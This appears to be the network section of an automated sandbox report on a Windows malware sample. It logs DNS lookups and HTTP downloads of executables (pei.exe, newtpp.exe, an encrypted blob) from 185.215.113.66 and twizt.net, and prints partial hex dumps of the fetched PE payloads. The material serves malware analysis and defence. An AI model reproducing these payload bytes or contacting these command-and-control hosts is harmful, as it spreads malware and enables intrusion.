                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:18.594888926 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:43.307086945 CET192.168.2.111.1.1.10xbc68Standard query (0)twizt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:38.962316990 CET192.168.2.111.1.1.10x1ebaStandard query (0)www.geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:05.082914114 CET192.168.2.111.1.1.10x9b9dStandard query (0)twizthash.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:35.644205093 CET1.1.1.1192.168.2.110x65dfNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:35.644205093 CET1.1.1.1192.168.2.110x65dfNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:43.593244076 CET1.1.1.1192.168.2.110xbc68No error (0)twizt.net185.215.113.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:39.100759983 CET1.1.1.1192.168.2.110x1ebaNo error (0)www.geoplugin.netgeoplugin.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:39.100759983 CET1.1.1.1192.168.2.110x1ebaNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:05.362502098 CET1.1.1.1192.168.2.110x9b9dNo error (0)twizthash.net185.215.113.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  0192.168.2.1149710185.215.113.66807420C:\Users\user\Desktop\f5TWdT5EAc.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:39.088346958 CET280OUTGET /pei.exe HTTP/1.1
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.486912966 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:31:40 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 10240
                                                                                                                                                                                                                                                  Last-Modified: Sun, 24 Nov 2024 16:23:03 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "674352e7-2800"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 64 0e 23 23 05 60 70 23 05 60 70 23 05 60 70 2a 7d f3 70 21 05 60 70 2a 7d f5 70 22 05 60 70 2a 7d e3 70 36 05 60 70 04 c3 1b 70 28 05 60 70 23 05 61 70 18 05 60 70 2a 7d e4 70 20 05 60 70 2a 7d f1 70 22 05 60 70 52 69 63 68 23 05 60 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 72 52 43 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 0e 00 00 00 16 00 00 00 00 00 00 e1 16 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 d6 e4 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$gd##`p#`p#`p*}p!`p*}p"`p*}p6`pp(`p#ap`p*}p `p*}p"`pRich#`pPELrRCg @`@l$@P#@ .text: `.rdata4 @@.data0@.rsrc@ @@.relocP$@B
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.486928940 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 81 ec 10 04 00 00 68 04 01 00 00 8d 84 24 0c 02 00 00 50 68 b4 21 40 00 ff 15 1c 20 40
                                                                                                                                                                                                                                                  Data Ascii: h$Ph!@ @$QT$h!@R @$P @t
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.488637924 CET1236INData Raw: 32 c0 81 c4 10 04 00 00 c3 6a 00 6a 02 6a 01 6a 00 6a 00 68 00 00 00 40 8d 4c 24 18 51 ff 15 20 20 40 00 83 f8 ff 74 07 50 ff 15 24 20 40 00 b0 01 81 c4 10 04 00 00 c3 cc 83 ec 54 6a 44 8d 44 24 14 6a 00 50 e8 33 03 00 00 83 c4 0c 33 c0 8d 14 24
                                                                                                                                                                                                                                                  Data Ascii: 2jjjjjh@L$Q @tP$ @TjDD$jP33$RD$D$D$D$D$Pjjj jjfL$\L$tjQjD$8DD$d @uh @T2T,SUV @Ph$4Ph!@D$ @
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.488686085 CET1236INData Raw: 98 20 40 00 8b 30 89 75 e0 8a 06 3c 20 77 4c 84 c0 74 06 83 7d e4 00 75 42 8a 06 84 c0 74 0a 3c 20 77 06 46 89 75 e0 eb f0 f6 45 c4 01 74 06 0f b7 45 c8 eb 03 6a 0a 58 50 56 6a 00 68 00 00 40 00 e8 ff fd ff ff a3 30 30 40 00 83 3d 24 30 40 00 00
                                                                                                                                                                                                                                                  Data Ascii: @0u< wLt}uBt< wFuEtEjXPVjh@00@=$0@u[P @<"u39MMP @YtFuFEMPQYYeE00@=$0@uP @=40@u @E00@3@eEMZf9@t
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.488697052 CET248INData Raw: 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 8b ff 55 8b ec ff 75 14 ff 75 10 ff 75 0c ff 75 08 68 06 1b 40 00 68 10 30 40 00 e8 f1 00 00 00 83 c4 18 5d c3 8b ff 56 68 00 00 03 00 68 00 00 01 00 33 f6 56 e8 e3 00 00 00 83 c4
                                                                                                                                                                                                                                                  Data Ascii: MdY__^[]QUuuuuh@h0@]Vhh3VtVVVVV^3U0@eeSWN@;tt0@`VEP4 @u3u0 @3, @3 @3EP( @E3E3;uO@u50@
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.490406990 CET1236INData Raw: 40 00 5e 5f 5b c9 c3 ff 25 58 20 40 00 ff 25 5c 20 40 00 ff 25 c4 20 40 00 ff 25 64 20 40 00 3b 0d 10 30 40 00 75 02 f3 c3 e9 13 00 00 00 cc ff 25 70 20 40 00 ff 25 74 20 40 00 ff 25 78 20 40 00 8b ff 55 8b ec 81 ec 28 03 00 00 a3 58 31 40 00 89
                                                                                                                                                                                                                                                  Data Ascii: @^_[%X @%\ @% @%d @;0@u%p @%t @%x @U(X1@T1@P1@L1@5H1@=D1@fp1@fd1@f@1@f<1@f%81@f-41@h1@E\1@E`1@El1@0@`1@\0@P0@T0@0@
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.490453959 CET1236INData Raw: 00 70 00 25 00 00 00 00 00 25 00 73 00 5c 00 33 00 33 00 35 00 37 00 33 00 35 00 33 00 37 00 2e 00 6a 00 70 00 67 00 00 00 25 00 74 00 65 00 6d 00 70 00 25 00 00 00 00 00 25 00 73 00 5c 00 25 00 64 00 25 00 64 00 2e 00 65 00 78 00 65 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: p%%s\33573537.jpg%temp%%s\%d%d.exeMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.490464926 CET248INData Raw: 78 69 74 00 00 fd 00 5f 61 63 6d 64 6c 6e 00 04 02 5f 69 6e 69 74 74 65 72 6d 00 05 02 5f 69 6e 69 74 74 65 72 6d 5f 65 00 3c 01 5f 63 6f 6e 66 69 67 74 68 72 65 61 64 6c 6f 63 61 6c 65 00 e3 00 5f 5f 73 65 74 75 73 65 72 6d 61 74 68 65 72 72 00
                                                                                                                                                                                                                                                  Data Ascii: xit_acmdln_initterm_initterm_e<_configthreadlocale__setusermatherr_adjust_fdiv__p__commode__p__fmodej_encode_pointer__set_app_typeC?terminate@@YAXXZ_unlock__dllonexitv_lock_onexit`_decode_pointe
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.491444111 CET1236INData Raw: 65 78 63 65 70 74 5f 68 61 6e 64 6c 65 72 34 5f 63 6f 6d 6d 6f 6e 00 0b 02 5f 69 6e 76 6f 6b 65 5f 77 61 74 73 6f 6e 00 00 3f 01 5f 63 6f 6e 74 72 6f 6c 66 70 5f 73 00 00 4b 01 5f 63 72 74 5f 64 65 62 75 67 67 65 72 5f 68 6f 6f 6b 00 00 97 00 49
                                                                                                                                                                                                                                                  Data Ascii: except_handler4_common_invoke_watson?_controlfp_sK_crt_debugger_hookInternetOpenUrlAjInternetCloseHandleInternetOpenAInternetReadFileInternetOpenUrlWInternetOpenWWININET.dllfURLDownloadToFileWurlmon.dllCCl
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.491530895 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:40.606827021 CET248INData Raw: 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50
                                                                                                                                                                                                                                                  Data Ascii: GPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGt00+020?0f0r0001&111X1


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  1192.168.2.1149721185.215.113.66807608C:\Users\user\AppData\Local\Temp\34D7.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:43.727128029 CET174OUTGET /newtpp.exe HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                                                                                                  Host: twizt.net
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.063201904 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:31:44 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 80896
                                                                                                                                                                                                                                                  Last-Modified: Tue, 12 Nov 2024 22:30:51 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "6733d71b-13c00"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cd d6 33 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e4 00 00 00 64 00 00 00 00 00 00 90 75 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$mpj)9)9)9 9.9Q8+9C9+9A9(99+9s9-9)99e9<9 9-9 959 9(9Rich)9PEL3gdu@p$.text `.rdata34@@.data(/@ @
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.063225985 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b 6c 24 08 8b 45 20 56 33 f6 57 8b 7c 24 20 85 c0 74 1c 8b 4f 04 39 08 75 0a 66
                                                                                                                                                                                                                                                  Data Ascii: Ul$E V3W|$ tO9ufPf;Wt@uu"j UGfO
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.064635038 CET1236INData Raw: 66 89 4e 04 8b 55 20 89 56 1c 83 c4 04 89 75 20 e8 45 c4 00 00 8b 4c 24 14 8b 7c 24 18 89 46 08 8b 44 24 1c 50 51 e8 0f 05 00 00 83 c4 08 84 c0 74 75 53 8d a4 24 00 00 00 00 8b 4e 0c 83 f9 04 72 64 8b 46 18 8b 10 83 c2 04 3b d1 77 58 83 7d 0c 00
                                                                                                                                                                                                                                                  Data Ascii: fNU Vu EL$|$FD$PQtuS$NrdF;wX}xttSWTAuD$$MPSWUNxF;uF+tP9RQA)~[_^]USV3W}\$OD$Phf@QD$$A
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.064647913 CET1236INData Raw: 24 1a c6 44 24 30 01 8b 46 08 68 ff ff 00 00 50 ff 15 18 02 41 00 8b 56 08 6a 10 8d 4c 24 10 51 52 ff 15 1c 02 41 00 83 f8 ff 75 12 56 e8 e4 fd ff ff 83 c4 04 5e 5b 33 c0 5f 83 c4 10 c3 6a 00 6a 00 56 68 00 11 40 00 6a 00 6a 00 89 5e 0c ff 15 a0
                                                                                                                                                                                                                                                  Data Ascii: $D$0FhPAVjL$QRAuV^[3_jjVh@jj^AF^[_FS2Ul$;FvNPQFAFFT$FWRPy~;uF;vu]F[Ft;r+F][+n][W|$/
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.064659119 CET248INData Raw: 00 00 8b 3d 34 01 41 00 ff d7 8b 74 24 0c 2b c6 3d e8 03 00 00 72 3e 8d 73 20 56 ff 15 f4 00 41 00 8b 7b 38 85 ff 74 24 83 bf 60 02 00 00 ff 74 16 8b bf 80 02 00 00 85 ff 75 ed 56 ff 15 f8 00 41 00 e9 80 00 00 00 e8 e6 fd ff ff 56 ff 15 f8 00 41
                                                                                                                                                                                                                                                  Data Ascii: =4At$+=r>s VA{8t$`tuVAVAr+='rgC PAs8tBjVRXA.+r`tP`uC PA4AD$CjP`A_^[]S
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.065449953 CET1236INData Raw: 00 55 8b 6c 24 0c 8b 8d 60 02 00 00 57 6a 00 56 6a 00 8d 44 24 1c 50 6a 01 8d 7e 1c 57 51 c7 44 24 2c 00 00 00 00 ff d3 85 c0 74 3e ff 15 58 02 41 00 3d e5 03 00 00 74 31 3d 33 27 00 00 75 30 6a 01 ff 15 38 01 41 00 8b 85 60 02 00 00 6a 00 56 6a
                                                                                                                                                                                                                                                  Data Ascii: Ul$`WjVjD$Pj~WQD$,t>XA=t1=3'u0j8A`jVjT$RjWPD$,u_][_]2[SW|$2?ilci8uUl$Vj<L$D$ UQF0Fnn$WF F,uV
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.065504074 CET1236INData Raw: 15 58 02 41 00 8b f0 8b 5c 24 18 8b 44 24 14 8b 4c 24 10 56 e8 8d fd ff ff 83 c4 04 6a ff 8d 4c 24 18 51 8b 4f 08 8d 54 24 18 52 8d 44 24 24 33 f6 50 51 89 74 24 2c 89 74 24 24 89 74 24 28 ff d5 8b 4c 24 10 85 c0 0f 95 c0 3b ce 75 8b 5b 5f 5e 5d
                                                                                                                                                                                                                                                  Data Ascii: XA\$D$L$VjL$QOT$RD$$3PQt$,t$$t$(L$;u[_^]8VjLe}rD$PPCOI(AL$,F PVAjjjjAF)jjjjAFFjjjjjj
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.065515995 CET248INData Raw: fc 8b 51 08 52 8b 45 fc 8b 08 51 e8 d2 12 00 00 83 c4 08 8b 55 fc 8b 02 50 e8 04 7d 00 00 83 c4 04 8b 4d fc c7 41 08 00 00 00 00 8b 55 fc c7 42 04 00 00 00 00 8b 45 08 8b 08 51 e8 e2 7c 00 00 83 c4 04 8b 55 08 c7 02 00 00 00 00 8b e5 5d c3 cc cc
                                                                                                                                                                                                                                                  Data Ascii: QREQUP}MAUBEQ|U]UEEMQURAEPMQUREQ'EUREQBUBE]UEM;Hs=UUEEMU;QsEUE
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.069541931 CET1236INData Raw: 04 33 c0 e9 c7 00 00 00 8b 55 08 8b 42 08 3b 45 0c 0f 83 89 00 00 00 8b 4d 08 8b 51 08 89 55 f4 8b 45 0c c1 e0 02 50 e8 ee 79 00 00 83 c4 04 89 45 f0 8b 4d 08 8b 11 89 55 f8 83 7d f0 00 75 1c 8b 45 f4 50 8b 4d f8 51 e8 9d 11 00 00 83 c4 08 8b 55
                                                                                                                                                                                                                                                  Data Ascii: 3UB;EMQUEPyEMU}uEPMQUR{EPMQUR:EPMQjUR{EMUEBMQUEEM;MsUM3]UEHQUP8
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.069633961 CET1236INData Raw: 89 55 f0 8b 45 e0 03 45 14 89 45 e0 c7 45 e4 00 00 00 00 8b 4d f0 89 4d ec 8b 55 e0 89 55 d4 8b 45 d4 33 d2 f7 75 f4 89 45 f0 8b 45 f0 0f af 45 f4 8b 4d d4 2b c8 89 4d e8 8b 55 e8 c1 e2 10 0b 55 d0 89 55 d4 81 7d f0 00 00 01 00 74 0c 8b 45 f0 0f
                                                                                                                                                                                                                                                  Data Ascii: UEEEEMMUUE3uEEEM+MUUU}tEE;Ev<MMUUUEEE}sMM;MvUUE%EMMMUREPMQUR;E%tMMUUUE
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:45.183346987 CET1236INData Raw: 4d 18 8b 11 52 8b 45 10 50 8b 4d 08 51 e8 10 0b 00 00 83 c4 10 8b 55 0c 89 02 33 c0 e9 1a 03 00 00 83 7d cc 00 7d 1b 8b 45 14 50 8b 4d 10 51 8b 55 0c 52 e8 ca 07 00 00 83 c4 0c 33 c0 e9 f9 02 00 00 83 7d cc 00 75 59 8b 45 fc 50 8b 4d 18 51 8b 55
                                                                                                                                                                                                                                                  Data Ascii: MREPMQU3}}EPMQUR3}uYEPMQURE}}EPMQUR3}uEPjMQ3EEUU} sEMT#UtEEMQUREPMQ
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:47.909708023 CET176OUTGET /peinstall.php HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                                                                                                                                                                                  Host: twizt.net
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:52.642520905 CET184INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:31:52 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  2192.168.2.1149747185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:54.827510118 CET166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247548103 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:31:55 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 9472
                                                                                                                                                                                                                                                  Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "674f01b0-2500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: a8 ae a9 45 71 6e c0 b6 37 92 82 98 6e c2 a5 8e 2a 25 0f 76 20 75 26 50 55 1b ea 98 8e dc 4b 3a 96 50 b2 58 9e 09 77 fc 6a 3e b2 ab 3f 68 e1 72 12 22 42 c3 f5 05 48 2b 3c f4 a3 5f 81 f1 69 40 de 88 46 74 8c a1 91 28 1e b3 2a b1 73 49 65 e4 30 ef 87 61 6c 0a 1b 2e 93 42 4d 1a 5f 8f db c0 ee 24 22 98 b5 6f 90 1b 36 1f 11 c7 a2 b9 2a e5 36 35 cf 09 16 aa fa 26 f0 e6 ac 23 26 a8 73 51 08 65 c5 6e 1a f7 9d 52 1b ba 02 48 1d c4 af c4 1a b4 1f ed be cd d6 16 b3 78 f7 81 a8 86 53 0d f6 07 4d b4 82 f1 f9 22 de 19 0a a4 97 3c b1 e5 7a c7 ec b5 bc e7 a9 6a 83 67 a1 1c 3e 3c 43 ec 39 84 b6 31 c7 5b 0b 3a 86 a9 ce 31 57 2f 03 ad cb 38 ec c0 01 c8 17 63 04 aa f1 90 8b d2 68 f6 1d 5b ba d7 10 6d a2 88 9a e8 eb 51 b1 13 00 f5 25 8e 1b 7f 62 70 b3 e9 bd bc 01 e8 18 3d be 3d 50 9b 98 a1 c2 24 ef f2 3f eb 2f cf 9f e3 e6 9b 35 85 3a 85 6a 04 c7 20 b2 30 bd e8 12 d0 cf 39 7b 0a 29 d4 84 52 4c 64 b5 a3 75 4e 80 ef 22 ae 05 61 3c 18 53 fd ad 22 1f 26 d1 00 46 9a bf a2 81 8d 9e 6f 98 71 49 b7 7d 53 7d 98 a8 4a fd bf da 86 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: Eqn7n*%v u&PUK:PXwj>?hr"BH+<_i@Ft(*sIe0al.BM_$"o6*65&#&sQenRHxSM"<zjg><C91[:1W/8ch[mQ%bp==P$?/5:j 09{)RLduN"a<S"&FoqI}S}J&fRt:Dx_B)OUDdx7Da}Zk)%j_7?Wg.l`<#Z#bp1PTbkGx7[5.!RFmw52)ZTNy8A(`_^Z`"7w\=Bz-s'Dxe%sI,_8<1Bp)a0Q_I^fBoaF>O*0X5(e/kaa.39[rJ&3V:9_k"ft{wTsVHcNER.tKB:c4+}U2M.! hm%C>={g_{NBaA~}_Rzyjm9Os+zQ[Z`Yi@RjaAaBmA@zY!+oUHWO$1fsK:0:*,a\n>\P(Lr@xSie;b|HyW9>Sgx%2S\4`zG
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247575998 CET1236INData Raw: 24 13 d6 38 8f fc 29 77 22 b4 15 19 b0 a1 cb b7 e0 4b 1c 76 57 dd 1d f0 60 d9 f7 52 69 5b 23 e7 38 30 47 63 bb ed 1b f7 15 f5 97 29 91 dd ce 82 b8 e8 94 a9 05 9b 8f 35 1e 45 c7 e8 20 ef d0 db 16 80 fe b4 ac eb 35 12 74 77 72 24 37 62 b3 27 5c 81
                                                                                                                                                                                                                                                  Data Ascii: $8)w"KvW`Ri[#80Gc)5E 5twr$7b'\{Zuw|1r $K/.v$$3xj7GI8wA>$6NFjh2m[=k08a}H E"5G[
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247587919 CET1236INData Raw: 89 11 90 f0 30 5d 06 79 7d 11 91 53 a2 46 2a 99 af 89 be 89 c8 83 47 2f 5e ef 6a 87 f1 7c 3a df a2 02 bb a3 df d2 1f 3a 08 9d e6 63 5d dd e3 c8 b4 1a ad 2a 53 c5 97 64 d5 9b b7 66 cc 4b 9e c7 1a 33 07 e8 ac 25 da a7 84 91 1d 25 bd de 9a e6 f7 1a
                                                                                                                                                                                                                                                  Data Ascii: 0]y}SF*G/^j|::c]*SdfK3%%4vriY^~4w/'`3Wx0b/".4*AM0IjS#O'1V##+.jtts*sp4F9a0{W{+mF9_X#9`<`811
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247601032 CET1236INData Raw: 1d be e3 38 fe 87 7e b5 6d 58 aa 5c 13 e6 a5 b7 77 a5 c8 43 39 e2 87 3a 9a d6 88 bd c1 a8 f5 24 83 23 a6 89 0d de 27 33 d7 55 67 b0 a9 0e 84 95 1d 85 2c 1d e0 b5 27 93 cb 6e db b1 78 8b c2 05 c1 16 93 b6 0f 53 d9 20 e5 88 aa c2 25 c4 f3 16 d3 1d
                                                                                                                                                                                                                                                  Data Ascii: 8~mX\wC9:$#'3Ug,'nxS %kU0]P>/DO\)#B+w~GkumhhFFjx6>`bz+Gb_k:EeWSIF+n8l-"kz.To()>H<#DIj$W:J/eU\ep
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247687101 CET1236INData Raw: 2f d2 b0 3f e0 39 9a 07 57 31 bc fd 0e 71 99 76 58 86 49 b0 90 52 15 84 2c 37 30 4e 73 a1 ca 93 3d 29 c7 b9 aa 3f 97 61 0f a3 a5 e1 dc 06 ec 8d 7f 52 6d 54 b5 79 ff eb 4b 04 ec 05 bd cd 2c 34 02 21 8b 77 e6 70 c0 d6 2f be 36 de 14 26 aa db 2a b7
                                                                                                                                                                                                                                                  Data Ascii: /?9W1qvXIR,70Ns=)?aRmTyK,4!wp/6&*_C2kYO~6~hcah\(W"hY$4C$fjz0nqh:~rfrN1Vx1qn>5T M .A'=+<
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247700930 CET1236INData Raw: f5 33 7e 51 d0 1d 0a cc 3f c9 2e 84 8f 1f 47 7d e2 6d e2 1a 0f f8 27 13 14 59 b3 46 45 33 ef f4 67 df eb e0 59 ff 29 b1 ea 12 c8 d9 b4 d1 af e6 9a fb a4 ba 80 a7 30 c6 d1 c0 f6 10 d3 09 45 64 60 be e2 7c cb 6d ea 76 2f 1b 4e e8 b1 98 dc 7f 2e b1
